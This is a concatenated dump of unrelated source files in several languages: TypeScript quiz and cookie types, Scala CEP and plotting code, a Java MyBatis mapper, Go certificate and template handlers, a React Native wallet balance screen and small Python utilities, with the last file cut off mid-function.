text stringlengths 1 1.05M |
|---|
<reponame>vovajr11/swf-client<gh_stars>1-10
export type TQuiz = {
_id: string;
name: string;
quizType: string;
questions: [];
};
export interface IQuizzes {
quizzes: TQuiz[];
}
export interface ISaveResultQuiz {
userId: string;
quizId: string;
quizName: string;
quizType: string;
score: number | null;
answers: string[];
}
export interface ICompletedQuiz {
quizId: string;
quizName: string;
quizType: string;
score: number | null;
answers: string[];
}
|
<filename>ceplib/src/main/scala/dbis/piglet/cep/ops/MatchCollector.scala
package dbis.piglet.cep.ops
import dbis.piglet.cep.nfa.NFAStructure
import scala.reflect.ClassTag
import scala.collection.mutable.ListBuffer
import scala.collection.mutable.ArrayBuffer
import dbis.piglet.backends.{SchemaClass => Event}
class MatchCollector[ T <: Event: ClassTag] extends Serializable {
var macthSequences: ListBuffer[NFAStructure[T]] = new ListBuffer()
def +(that: NFAStructure[T]): Unit = macthSequences += that
def size: Int = macthSequences.size
def convertEventsToArray(): ArrayBuffer[T] = {
var events: ArrayBuffer[T] = new ArrayBuffer()
macthSequences.foreach (seq => events ++= seq.events)
events
}
def convertEventsToBoolean(): ArrayBuffer[Boolean] = {
ArrayBuffer(macthSequences.size > 0)
}
} |
package com.atjl.dbtiming.mapper.gen;
import com.atjl.dbtiming.domain.gen.GenTaskRuned;
import com.atjl.dbtiming.domain.gen.GenTaskRunedExample;
import java.util.List;
import org.apache.ibatis.annotations.Param;
public interface GenTaskRunedMapper {
int countByExample(GenTaskRunedExample example);
int deleteByExample(GenTaskRunedExample example);
int deleteByPrimaryKey(Long tid);
int insert(GenTaskRuned record);
int insertSelective(GenTaskRuned record);
List<GenTaskRuned> selectByExample(GenTaskRunedExample example);
GenTaskRuned selectByPrimaryKey(Long tid);
int updateByExampleSelective(@Param("record") GenTaskRuned record, @Param("example") GenTaskRunedExample example);
int updateByExample(@Param("record") GenTaskRuned record, @Param("example") GenTaskRunedExample example);
int updateByPrimaryKeySelective(GenTaskRuned record);
int updateByPrimaryKey(GenTaskRuned record);
} |
<filename>dto/certificate.go<gh_stars>1-10
package dto
import (
"crypto/x509"
"time"
"github.com/feeltheajf/ztca/pki"
)
var (
Certificates = &certificateService{}
)
type Certificate struct {
Model
Raw string `json:"raw"`
SerialNumber string `json:"serialNumber"`
ExpiresAt time.Time `json:"expiresAt"`
// user metadata
Username string `json:"username"`
DeviceSerial string `json:"deviceSerial"`
}
func (crt *Certificate) X509() *x509.Certificate {
x509, err := pki.UnmarshalCertificate(crt.Raw)
if err != nil {
panic(err)
}
return x509
}
type certificateService service
func (cs *certificateService) Save(crt *Certificate) error {
return db.Create(crt).Error
}
func (cs *certificateService) Load(username string) (*Certificate, error) {
crt := new(Certificate)
return crt, db.Where("username = ?", username).First(crt).Error
}
func (cs *certificateService) Delete(crt *Certificate) error {
return db.Delete(crt).Error
}
|
SELECT
first_name,
last_name,
AVG(salary) AS average_salary
FROM employees
GROUP BY first_name, last_name; |
#python main.py --model PACN --save pacn_X2 --scale 2 --reset --save_results --patch_size 96
#python main.py --model PACN --save pacn_X3 --scale 3 --reset --save_results --patch_size 144
#python main.py --model PACN --save pacn_X4 --scale 4 --reset --save_results --patch_size 192
#python main.py --model PACN --data_test Manga109 --scale 3 --pre_train ../experiment/model/pacn_X3.pt --test_only --save_results
|
---
---
{% include js/jquery/jquery.slim.min.js %}
{% include js/moment/moment.min.js %}
{% include js/bootstrap/bootstrap.min.js %}
{% include js/abba/utils.js %}
$(document).ready(function() {
{% include js/abba/main.js %}
});
|
<reponame>zarly/props-and-cons
import {merge} from 'lodash'
import base from './default'
export default merge({
environment: 'production',
mongoose: 'mongodb://localhost:27017/props-and-cons-production',
auth: {
vkapp: {
disableVerification: false,
}
},
logging: {
morganFormat: 'combined',
},
}, base);
|
import numpy as np
from astropy import coordinates as coord
def process_arguments(_args):
result = []
for arg in _args:
if isinstance(arg, (int, float)):
result.append(arg ** 2)
elif callable(arg):
result.append(arg())
elif isinstance(arg, list) and not arg:
pass # Skip empty list
elif isinstance(arg, np.ndarray):
result.append(arg)
elif isinstance(arg, coord.ICRS):
result.append(str(arg))
return result
# Test the function with the given _args
processed_result = process_arguments(_args)
print(processed_result) |
<gh_stars>0
export const Color = {
DEFAULT: 'default',
PRIMARY: 'primary',
SUCCESS: 'success',
DANGER: 'danger',
WARNING: 'warning'
};
export const Size = {
LARGE: 'large',
NORMAL: 'normal',
SMALL: 'small',
TINY: 'tiny'
};
|
import { Error } from 'http';
/**
* 요청의 오류 출력
* @extends Error
*/
export default class HTTPError extends Error {
public status: number;
public method: string;
public name: string;
constructor({ message, status }: Error, method: string, name?: string) {
super(message);
/**
* 에러명
* @type {string}
*/
this.name = name || `[ REJECTION ] HTTPError`;
/**
* 요청에서 반환된 HTTP 오류 코드
* @type {number}
*/
this.status = status ?? 500;
/**
* 요청에 사용되는 HTTP 메서드
* @type {string}
*/
this.method = method;
/**
* 앱으로 전송된 HTTP 데이터
* @typedef {Object} HTTPErrorData
* @property {*} json 전송된 JSON 데이터
* @property {HTTPAttachmentData[]} files 이 요청과 함께 전송된 파일이 있는 경우
*/
/**
* @TODO 확장 생각하기
*
* 앱으로 전송된 첨부 데이터
* @typedef {Object} HTTPAttachmentData
* @property {string|Buffer|Stream} attachment 첨부 데이터의 원본
* @property {string} name 파일명
* @property {Buffer|Stream} file 파일버퍼
*/
}
}
|
<reponame>Ipxxiao/zax-cookie
/**
* Cookie module.
*/
declare type DateType = number | Date | undefined;
interface Attributes {
path: string;
domain: string | undefined;
expires?: DateType;
secure?: boolean;
httpOnly?: boolean;
sameSite?: 'strict' | 'lax' | 'none';
'max-age'?: any;
}
/**
* get domain
*
* @example
* ```js
* getDomain()
* //=> localhost
* ```
*
* @returns {String}
*/
declare const getDomain: () => string | undefined;
/**
* set cookie
*
* @example
* ```js
* setCookie('token', '<PASSWORD>')
* //=> token=<PASSWORD>; path=/; domain=localhost
* ```
*
* @param key {String} set cookie key
* @param value {String} set cookie value
* @param attributes {Number | Object} set days or attributes
*
* @returns {String}
*/
declare const setCookie: (key: string, value: string, attributes?: number | Attributes | undefined) => string | void;
/**
* get cookie
*
* @example
* ```js
* getCookie('token')
* //=> abc
* ```
*
* @param key {String} get cookie key
*
* @returns {String}
*/
declare const getCookie: (key: string) => string | void;
/**
* del cookie
*
* @example
* ```js
* delCookie('token')
* ```
*
* @param key {String} del cookie key
* @param attributes {Object}
*/
declare const delCookie: (key: string, attributes?: Attributes | undefined) => void;
/**
* clear all cookie
*
* @example
* ```js
* clearCookie()
* ```
*/
declare const clearCookie: () => void;
export { getDomain, setCookie, getCookie, delCookie, clearCookie, };
declare const _default: {
getDomain: () => string | undefined;
set: (key: string, value: string, attributes?: number | Attributes | undefined) => string | void;
get: (key: string) => string | void;
del: (key: string, attributes?: Attributes | undefined) => void;
clear: () => void;
};
export default _default;
|
<gh_stars>1-10
/*******************************************************************************
* Copyright (c) 2008 SAP AG.
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse License v1.0
* which accompanies this distribution, and is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* Contributors:
* SAP AG - initial API and implementation
*******************************************************************************/
package org.eclipse.mat.snapshot.model;
import java.util.List;
/**
* Interface for a plain vanilla object instance in the heap dump.
*
* @noimplement
*/
public interface IInstance extends IObject {
/**
* Returns all fields of the object.
* <p>
* Fields are ordered in such a way, that first fields defined in the current class and then fields of the super
* class and its super classes are returned. This order is important to know, if a class declares a field by the
* same name as the class it inherits from.
*/
List<Field> getFields();
/**
* Returns the field identified by the name.
* <p>
* If declares a member variable by the same name as the parent class does, then the result of this method is
* undefined.
*/
Field getField(String name);
}
|
def solveMaze(maze):
"""Find the shortest path between the start and end points in a 2D array maze.
Arguments:
maze {2D array} -- 2D array representing a maze.
Returns:
Array -- An array of coordinates representing the shortest path.
"""
# keep track of the number of rows and columns in the maze
rows = len(maze)
cols = len(maze[0])
# Initialize the queue with the start point
queue = deque([(0, 0)])
# Keep track of the path taken
path = []
# keep track of the visited cells
visited = set()
# loop while the queue is not empty
while queue:
# pop the current point from the queue
r, c = queue.popleft()
# check if it is the end point
if r == rows - 1 and c == cols - 1:
path.append((r, c))
return path
# Mark the current point as visited
visited.add((r, c))
# check the neighboring cells
for dr, dc in [(1, 0), (-1, 0), (0, 1), (0, -1)]:
row = r + dr
col = c + dc
# check if the cell is valid and not visited
if 0 <= row < rows and 0 <= col < cols and (row, col) not in visited and maze[row][col] == ' ':
# add the cell to the path
path.append((r, c))
# add the cell to the queue
queue.append((row, col))
# return None if there is no path
return None |
<reponame>IrynaGrusha/trusteeWallet<gh_stars>0
/**
* @version 0.11
* @author yura
*/
import React, { Component } from 'react'
import { connect } from 'react-redux'
import { View, Text, Animated, TouchableOpacity, Image, Switch, Platform, Dimensions, PixelRatio } from 'react-native'
import AsyncStorage from '@react-native-community/async-storage'
import Entypo from 'react-native-vector-icons/Entypo'
import moment from 'moment'
import 'moment/min/locales.min'
import QRCodeBtn from '../../../assets/images/qrCodeBtn'
import NavStore from '../../../components/navigation/NavStore'
import ToolTips from '../../../components/elements/ToolTips'
import GradientView from '../../../components/elements/GradientView'
import LetterSpacing from '../../../components/elements/LetterSpacing'
import { setQRConfig, setQRValue } from '../../../appstores/Stores/QRCodeScanner/QRCodeScannerActions'
import { sublocale, strings } from '../../../services/i18n'
import Log from '../../../services/Log/Log'
import MarketingEvent from '../../../services/Marketing/MarketingEvent'
import { capitalize } from '../../../services/UI/Capitalize/Capitalize'
import { checkQRPermission } from '../../../services/UI/Qr/QrPermissions'
import { saveSelectedBasicCurrencyCode } from '../../../appstores/Stores/Main/MainStoreActions'
import WalletName from './WalletName/WalletName'
import settingsActions from '../../../appstores/Stores/Settings/SettingsActions'
import BlocksoftBN from '../../../../crypto/common/BlocksoftBN'
import BlocksoftUtils from '../../../../crypto/common/BlocksoftUtils'
import BlocksoftPrettyNumbers from '../../../../crypto/common/BlocksoftPrettyNumbers'
import { acc } from 'react-native-reanimated'
import BlocksoftCryptoLog from '../../../../crypto/common/BlocksoftCryptoLog'
import {showModal} from '../../../appstores/Stores/Modal/ModalActions'
import DaemonCache from '../../../daemons/DaemonCache'
const { width: SCREEN_WIDTH } = Dimensions.get('window')
const PIXEL_RATIO = PixelRatio.get()
let SIZE = 16
if (PIXEL_RATIO === 2 && SCREEN_WIDTH < 330) {
SIZE = 8 // iphone 5s
}
let CACHE_PREV_CURRENCY = false
class WalletInfo extends Component {
constructor(props) {
super(props)
this.state = {
minus: 0,
progress: new Animated.Value(0),
opacity: new Animated.Value(1),
isViolet: false,
iconName: '',
styles
}
}
_oneFunction(cryptoCurrencies, selectedBasicCurrency, accountList) {
//MarketingEvent.setBalance(walletHash, 'TOTAL', totalBalanceString, { totalBalance, totalBalanceString, basicCurrencyCode: selectedBasicCurrency.currencyCode, walletHash })
}
// eslint-disable-next-line camelcase
async UNSAFE_componentWillMount() {
try {
moment.locale(sublocale())
AsyncStorage.getItem('isViolet').then(res => {
let isViolet = res
isViolet = isViolet !== null ? JSON.parse(isViolet) : false
this.setState(({
isViolet,
styles: isViolet ? stylesViolet : styles
}))
})
} catch (e) {
Log.err('HomeScreen.WalletInfo Unsafe mount error ' + e.message)
}
}
handleChangeLocal = async () => {
const selectedBasicCurrency = this.props.selectedBasicCurrency
Log.log('HomeScreen.WalletInfo handleChangeLocal', selectedBasicCurrency)
if (selectedBasicCurrency.currencyCode !== 'USD') {
if (CACHE_PREV_CURRENCY !== selectedBasicCurrency.currencyCode) {
await settingsActions.setSettings('local_currency_homescreen', selectedBasicCurrency.currencyCode)
CACHE_PREV_CURRENCY = selectedBasicCurrency.currencyCode
}
await saveSelectedBasicCurrencyCode('USD')
} else {
if (!CACHE_PREV_CURRENCY) {
CACHE_PREV_CURRENCY = await settingsActions.getSetting('local_currency_homescreen')
}
if (!CACHE_PREV_CURRENCY) {
CACHE_PREV_CURRENCY = 'UAH'
}
await saveSelectedBasicCurrencyCode(CACHE_PREV_CURRENCY)
}
}
handleScanQr = () => checkQRPermission(this.qrPermissionCallback)
qrPermissionCallback = () => {
Log.log('WalletInfo handleScanQr started')
setQRConfig({
name: strings('components.elements.input.qrName'),
successMessage: strings('components.elements.input.qrSuccess'),
type: 'MAIN_SCANNER'
})
setQRValue('')
NavStore.goNext('QRCodeScannerScreen')
}
toggleViolet = async () => {
await AsyncStorage.setItem('isViolet', JSON.stringify(!this.state.isViolet))
Animated.timing(this.state.opacity, {
toValue: 0,
duration: 300
}).start(() => {
this.setState({
isViolet: !this.state.isViolet,
styles: !this.state.isViolet ? stylesViolet : styles
}, () => {
Animated.timing(this.state.opacity, {
toValue: 1,
duration: 300
}).start()
})
})
}
renderTooltip = ({ styles }) => {
return (
<View style={styles.addAsset__content}>
<Entypo style={styles.addAsset__icon} size={13} name="plus"/>
<Text style={styles.addAsset__text}>
{strings('settings.assets.addAsset')}
</Text>
<Image
style={[styles.img__hor, styles.img__hor_right]}
resizeMode={'stretch'}
source={styles.img__paths.right}
/>
<Image
style={[styles.img__hor, styles.img__hor_left]}
resizeMode={'stretch'}
source={styles.img__paths.left}
/>
<Image
style={[styles.img__ver]}
resizeMode={'stretch'}
source={styles.img__paths.line}
/>
</View>
)
}
handlerRBF = async () => {
showModal({
type: 'RBF_ACTIVE',
icon: 'WARNING',
title: strings('modal.tbkModal.title'),
description: null,
},async () => {
const isActiveRBF = await AsyncStorage.getItem('RBF')
if (isActiveRBF === null || isActiveRBF.toString() === '0'){
await AsyncStorage.setItem('RBF', '1')
}else {
await AsyncStorage.setItem('RBF', '0')
}
})
}
render() {
const selectedWallet = this.props.selectedWallet
const selectedBasicCurrency = this.props.selectedBasicCurrency
let { styles } = this.state
let localCurrencySymbol = selectedBasicCurrency.symbol
if (!localCurrencySymbol) {
localCurrencySymbol = selectedBasicCurrency.currencyCode
}
const CACHE_SUM = DaemonCache.getCache(selectedWallet.walletHash)
let totalBalance = 0
if (CACHE_SUM) {
totalBalance = CACHE_SUM.balance
if (localCurrencySymbol !== CACHE_SUM.basicCurrencySymbol) {
localCurrencySymbol = CACHE_SUM.basicCurrencySymbol
}
}
let tmp = totalBalance.toString().split('.')
let totalBalancePrep1 = BlocksoftPrettyNumbers.makeCut(tmp[0]).separated
let totalBalancePrep2 = ''
if (typeof tmp[1] !== 'undefined') {
totalBalancePrep2 = '.' + tmp[1].substr(0, 2)
}
// @misha to optimize
const date = new Date()
const todayPrep = `${strings('homeScreen.today')}, ${date.getDate()} ${capitalize(moment(date).format('MMM'))}`
return (
<View style={{ ...styles.wrapper }}>
<View style={styles.top}>
<View style={{ width: 48, height: 25 }}>
{
Platform.OS === 'android' ?
<Switch
thumbColor="#fff"
trackColor={{ true: '#864DD9', false: '#dadada' }}
onValueChange={this.toggleViolet}
value={this.state.isViolet}/>
:
<Switch
trackColor={{ true: '#864DD9' }}
style={{ marginTop: -3, transform: [{ scaleX: .7 }, { scaleY: .7 }] }}
onValueChange={this.toggleViolet}
value={this.state.isViolet}/>
}
</View>
<View>
<WalletName
walletHash={selectedWallet.walletHash || ''}
walletNameText={selectedWallet.walletName || ''} />
</View>
<TouchableOpacity style={styles.qr} onPress={this.handleScanQr}>
<QRCodeBtn width={18} height={18}/>
</TouchableOpacity>
</View>
<Animated.View style={{ position: 'relative', width: '100%', paddingBottom: 20, opacity: this.state.opacity }}>
<View style={styles.container}>
<GradientView style={styles.container__bg} array={styles.containerBG.array} start={styles.containerBG.start} end={styles.containerBG.end}>
<View style={styles.container__top}>
<View style={styles.container__top__left}>
<Text style={styles.container__title}>
{strings('homeScreen.balance')}
</Text>
<LetterSpacing text={todayPrep} textStyle={styles.container__date} letterSpacing={1}/>
</View>
<TouchableOpacity style={styles.addAsset} onPress={() => NavStore.goNext('AddAssetScreen')} onLongPress={() => this.handlerRBF()} delayLongPress={2500}>
<ToolTips type={'HOME_SCREEN_ADD_CRYPTO_BTN_TIP'} height={100} MainComponent={this.renderTooltip} mainComponentProps={{ styles }}/>
</TouchableOpacity>
</View>
<View style={styles.walletInfo__content}>
<TouchableOpacity onPress={this.handleChangeLocal}>
<Text style={{ ...styles.walletInfo__text_small, ...styles.walletInfo__text_small_first }}>{localCurrencySymbol} </Text>
</TouchableOpacity>
<Text style={styles.walletInfo__text_middle}>{totalBalancePrep1}</Text>
<Text style={styles.walletInfo__text_small}>{totalBalancePrep2}</Text>
{/* <Feather name={iconName} style={styles.walletInfo__icon} /> */}
</View>
<View style={styles.container__text}>
{/* <LetterSpacing text={changedLastDay} textStyle={styles.container__text} letterSpacing={1} /> */}
</View>
</GradientView>
{
// this.props.isSnow ?
// <TouchableOpacity style={{ position: "absolute", bottom: 0, right: 0, padding: 16 }} onPress={this.props.toggleSnow}>
// <Fontisto style={styles.snowBtn__icon} name="snowflake-8" size={20} />
// </TouchableOpacity> : null
}
</View>
<View style={styles.shadow}>
<View style={styles.shadow__item}/>
</View>
</Animated.View>
{/* <View style={styles.container}> */}
{/* <View style={styles.top}> */}
{/* <Text style={styles.walletInfo__title}> */}
{/* { selectedWallet.wallet_name } */}
{/* </Text> */}
{/* </View> */}
{/* { */}
{/* /**/}
{/* <View style={{...styles.containerRow, marginTop: -20}}> */}
{/* <Text style={styles.bottomText}>- $ { +this.state.minus } ({ ((this.state.minus * 100) / totalBalance).toFixed(3) }%)</Text> */}
{/* <View style={styles.iconArrow}> */}
{/* <Icon name="ios-arrow-round-down" size={18} color="#fc5088" /> */}
{/* </View> */}
{/* </View> */}
{/* */}
{/* } */}
</View>
)
}
}
const mapStateToProps = (state) => {
return {
selectedWallet: state.mainStore.selectedWallet,
selectedBasicCurrency: state.mainStore.selectedBasicCurrency,
cryptoCurrencies: state.currencyStore.cryptoCurrencies,
accountList: state.accountStore.accountList
}
}
const mapDispatchToProps = (dispatch) => {
return {
dispatch
}
}
export default connect(mapStateToProps, mapDispatchToProps)(WalletInfo)
const styles = {
wrapper: {
position: 'relative'
},
top: {
flexDirection: 'row',
justifyContent: 'space-between',
alignItems: 'center',
marginHorizontal: SIZE,
marginTop: Platform.OS === 'android' ? 35 : 0
},
top__title: {
fontFamily: 'Montserrat-Bold',
color: '#404040',
fontSize: 12
},
qr: {
paddingVertical: 13,
paddingHorizontal: 15
},
shadow: {
position: 'absolute',
top: 0,
left: 0,
width: '100%',
height: 127,
zIndex: 1
},
shadow__item: {
marginHorizontal: 22,
marginTop: 18,
height: 122,
backgroundColor: '#fff',
borderRadius: SIZE,
shadowColor: '#000',
shadowOffset: {
width: 0,
height: 5
},
shadowOpacity: 0.34,
shadowRadius: 6.27,
elevation: 10
},
container: {
position: 'relative',
height: 140,
marginHorizontal: SIZE,
// shadowOffset: {
// width: 0,
// height: 1
// },
// shadowOpacity: 0.22,
// shadowRadius: 2.22,
//
// elevation: 3,
backgroundColor: '#fff',
borderRadius: SIZE,
zIndex: 2
},
container__bg: {
flex: 1,
paddingLeft: SIZE - 1,
paddingBottom: SIZE - 1,
borderRadius: SIZE
},
container__top: {
flexDirection: 'row',
justifyContent: 'space-between',
alignItems: 'flex-start',
marginBottom: 4
},
container__title: {
marginTop: 14,
marginLeft: -1,
fontFamily: 'Montserrat-Bold',
color: '#404040',
fontSize: 14
},
container__text: {
color: '#939393',
fontFamily: 'SFUIDisplay-Bold',
fontSize: 8
},
container__date: {
marginTop: 2,
fontSize: 10,
fontFamily: 'SFUIDisplay-Semibold',
color: '#939393'
},
containerBG: {
array: ['#fff', '#f2f2f2'],
start: { x: 1, y: 0 },
end: { x: 1, y: 1 }
},
walletInfo__title: {
marginTop: 7,
color: '#f4f4f4',
fontSize: 12,
fontFamily: 'SFUIDisplay-Semibold'
},
containerRow: {
flexDirection: 'row',
alignItems: 'flex-start'
},
walletInfo__content: {
marginBottom: 8,
flexDirection: 'row',
alignItems: 'flex-end'
},
walletInfo__text_small: {
// height: 22,
fontSize: 20,
fontFamily: 'Montserrat-Medium',
color: '#404040',
// lineHeight: 25,
opacity: .8
},
walletInfo__text_small_first: {
marginRight: 5
},
walletInfo__text_middle: {
height: 42,
fontSize: 52,
fontFamily: 'Montserrat-Light',
color: '#404040',
lineHeight: 50
},
walletInfo__icon: {
marginLeft: 3,
marginBottom: Platform.OS === 'ios' ? -4.5 : -2,
color: '#939393',
fontSize: 28
},
img__paths: {
left: require('../../../assets/images/addAssetborderShadowLeft.png'),
right: require('../../../assets/images/addAssetborderShadowRight.png'),
line: require('../../../assets/images/addAssetborderShadowLines.png')
},
img__ver: {
flex: 1,
position: 'absolute',
top: -6,
left: 5,
width: '103%',
height: 39,
opacity: .5,
zIndex: 2
},
img__hor: {
flex: 1,
position: 'absolute',
top: -6,
width: 10,
height: 39,
opacity: .5,
zIndex: 2
},
img__hor_right: {
right: -5
},
img__hor_left: {
left: -5
},
addAsset: {
paddingVertical: 19,
paddingHorizontal: 15
},
addAsset__content: {
position: 'relative',
flexDirection: 'row',
alignItems: 'center',
height: 30,
paddingHorizontal: 8,
paddingVertical: 5,
paddingLeft: 4,
borderRadius: 6,
borderColor: '#864DD9',
borderWidth: 1.5
},
addAsset__text: {
fontSize: 10,
color: '#864DD9',
fontFamily: 'Montserrat-Bold'
},
addAsset__icon: {
marginRight: 2,
marginTop: 1,
color: '#864DD9'
},
snowBtn__icon: {
color: '#864DD9'
}
}
const stylesViolet = {
wrapper: {
position: 'relative'
},
top: {
flexDirection: 'row',
justifyContent: 'space-between',
alignItems: 'center',
marginHorizontal: SIZE,
marginTop: Platform.OS === 'android' ? 35 : 0
},
top__title: {
fontFamily: 'Montserrat-Bold',
color: '#404040',
fontSize: 12
},
qr: {
paddingVertical: 13,
paddingHorizontal: 15
},
shadow: {
position: 'absolute',
top: 0,
left: 0,
width: '100%',
height: 127,
zIndex: 1
},
shadow__item: {
marginHorizontal: 22,
marginTop: 18,
height: 122,
backgroundColor: '#fff',
borderRadius: SIZE,
shadowColor: '#000',
shadowOffset: {
width: 0,
height: 5
},
shadowOpacity: 0.34,
shadowRadius: 6.27,
elevation: 10
},
container: {
position: 'relative',
height: 140,
marginHorizontal: SIZE,
// shadowOffset: {
// width: 0,
// height: 1
// },
// shadowOpacity: 0.22,
// shadowRadius: 2.22,
//
// elevation: 3,
backgroundColor: '#fff',
borderRadius: SIZE,
zIndex: 2
},
container__bg: {
flex: 1,
paddingLeft: SIZE - 1,
paddingBottom: SIZE - 1,
borderRadius: SIZE
},
container__top: {
flexDirection: 'row',
justifyContent: 'space-between',
alignItems: 'flex-start',
marginBottom: 4
},
container__title: {
marginTop: 14,
marginLeft: -1,
fontFamily: 'Montserrat-Bold',
color: '#fff',
fontSize: 14
},
container__text: {
color: '#DCBAFB',
fontFamily: 'SFUIDisplay-Bold',
fontSize: 8
},
container__date: {
marginTop: 2,
fontSize: 10,
fontFamily: 'SFUIDisplay-Semibold',
color: '#DCBAFB'
},
containerBG: {
array: ['#9D4AA2', '#43156D'],
start: { x: 1, y: 0 },
end: { x: 1, y: 1 }
},
walletInfo__title: {
marginTop: 7,
color: '#f4f4f4',
fontSize: 12,
fontFamily: 'SFUIDisplay-Semibold'
},
containerRow: {
flexDirection: 'row',
alignItems: 'flex-start'
},
walletInfo__content: {
marginBottom: 8,
flexDirection: 'row',
alignItems: 'flex-end'
},
walletInfo__text_small: {
// height: 22,
fontSize: 20,
fontFamily: 'Montserrat-Medium',
color: '#F3E6FF',
// lineHeight: 25,
opacity: .8
},
walletInfo__text_small_first: {
marginRight: 5
},
walletInfo__text_middle: {
height: 42,
fontSize: 52,
fontFamily: 'Montserrat-Light',
color: '#fff',
lineHeight: 50
},
walletInfo__icon: {
marginLeft: 3,
marginBottom: Platform.OS === 'ios' ? -4.5 : -2,
color: '#DCBAFB',
fontSize: 28
},
img__paths: {
left: require('../../../assets/images/addAssetBorderShadowLeftLight.png'),
right: require('../../../assets/images/addAssetBorderShadowRightLight.png'),
line: require('../../../assets/images/addAssetBorderShadowLinesLight.png')
},
img__ver: {
flex: 1,
position: 'absolute',
top: -6,
left: 4,
width: '105%',
height: 38,
opacity: .5,
zIndex: 2
},
img__hor: {
flex: 1,
position: 'absolute',
top: -6,
width: 10,
height: 38,
opacity: .5,
zIndex: 2
},
img__hor_right: {
right: -5
},
img__hor_left: {
left: -5
},
addAsset: {
paddingVertical: 19,
paddingHorizontal: 15
},
addAsset__content: {
position: 'relative',
flexDirection: 'row',
alignItems: 'center',
height: 30,
paddingHorizontal: 8,
paddingVertical: 5,
paddingLeft: 4,
borderRadius: 6,
borderColor: '#F3E6FF',
borderWidth: 1.5
},
addAsset__text: {
fontSize: 10,
color: '#F3E6FF',
fontFamily: 'Montserrat-Bold'
},
addAsset__icon: {
marginRight: 2,
marginTop: 1,
color: '#F3E6FF'
},
snowBtn__icon: {
color: '#F3E6FF'
}
}
|
<reponame>sthagen/drone-drone
// Copyright 2019 Drone.IO Inc. All rights reserved.
// Use of this source code is governed by the Drone Non-Commercial License
// that can be found in the LICENSE file.
// +build !oss
package template
import (
"net/http"
"github.com/drone/drone/core"
"github.com/drone/drone/handler/api/render"
"github.com/go-chi/chi"
)
// HandleFind returns an http.HandlerFunc that writes json-encoded
// template details to the the response body.
func HandleFind(templateStore core.TemplateStore) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
var (
name = chi.URLParam(r, "name")
namespace = chi.URLParam(r, "namespace")
)
template, err := templateStore.FindName(r.Context(), name, namespace)
if err != nil {
render.NotFound(w, err)
return
}
render.JSON(w, template, 200)
}
}
|
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/1024+0+512-shuffled-N-VB/13-model --tokenizer_name model-configs/1536-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/1024+0+512-shuffled-N-VB/13-0+1024+512-first-256 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function identity_sixth --eval_function penultimate_sixth_eval |
/*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
export { EuiColorPicker, EuiColorPickerProps } from './color_picker';
export {
EuiColorPickerSwatch,
EuiColorPickerSwatchProps,
} from './color_picker_swatch';
export { EuiHue, EuiHueProps } from './hue';
export { EuiSaturation, EuiSaturationProps } from './saturation';
export { EuiColorStops } from './color_stops';
// TODO: Exporting `EuiColorStopsProps` from `'./color_stops'`
// results in a duplicate d.ts entry that causes build warnings
// and potential downstream TS project failures.
export { EuiColorStopsProps } from './color_stops/color_stops';
export {
EuiColorPalettePicker,
EuiColorPalettePickerProps,
EuiColorPalettePickerPaletteProps,
} from './color_palette_picker';
export {
EuiColorPaletteDisplay,
EuiColorPaletteDisplayProps,
} from './color_palette_display';
|
<reponame>ryan-richt/evilplot<filename>js/src/main/scala/com/cibo/evilplot/EvilPlot.scala<gh_stars>0
/*
* Copyright (c) 2018, CiBO Technologies, Inc.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its contributors
* may be used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.cibo.evilplot
import java.util.UUID
import com.cibo.evilplot.colors.{Color, DefaultColors, HEX, HTMLNamedColors}
import com.cibo.evilplot.demo.DemoPlots
import com.cibo.evilplot.geometry.Clipping.Edge
import com.cibo.evilplot.geometry._
import com.cibo.evilplot.numeric.Point
import com.cibo.evilplot.plot.{LinePlot, Overlay}
import com.cibo.evilplot.plot.renderers.PathRenderer
import org.scalajs.dom
import org.scalajs.dom.CanvasRenderingContext2D
import org.scalajs.dom.raw.HTMLCanvasElement
import scala.scalajs.js.annotation.{JSExport, JSExportTopLevel}
@JSExportTopLevel("EvilPlot")
object EvilPlot {
/** Render a plot definition to the specified canvas. */
@JSExport
def renderEvilPlot(json: String, canvasId: String, width: Double, height: Double): Unit = {
renderEvilPlot(json, canvasId, Some(Extent(width, height)))
}
@JSExport
def renderEvilPlot(json: String, canvasId: String): Unit = {
renderEvilPlot(json, canvasId, None)
}
def renderEvilPlot(json: String, canvasId: String, size: Option[Extent]): Unit = {
val definition = JSONUtils.decodeStr[Drawable](json)
renderEvilPlot(definition, canvasId, size)
}
def renderEvilPlot(plot: Drawable, canvasId: String, size: Option[Extent]): Unit = {
val paddingHack = 20
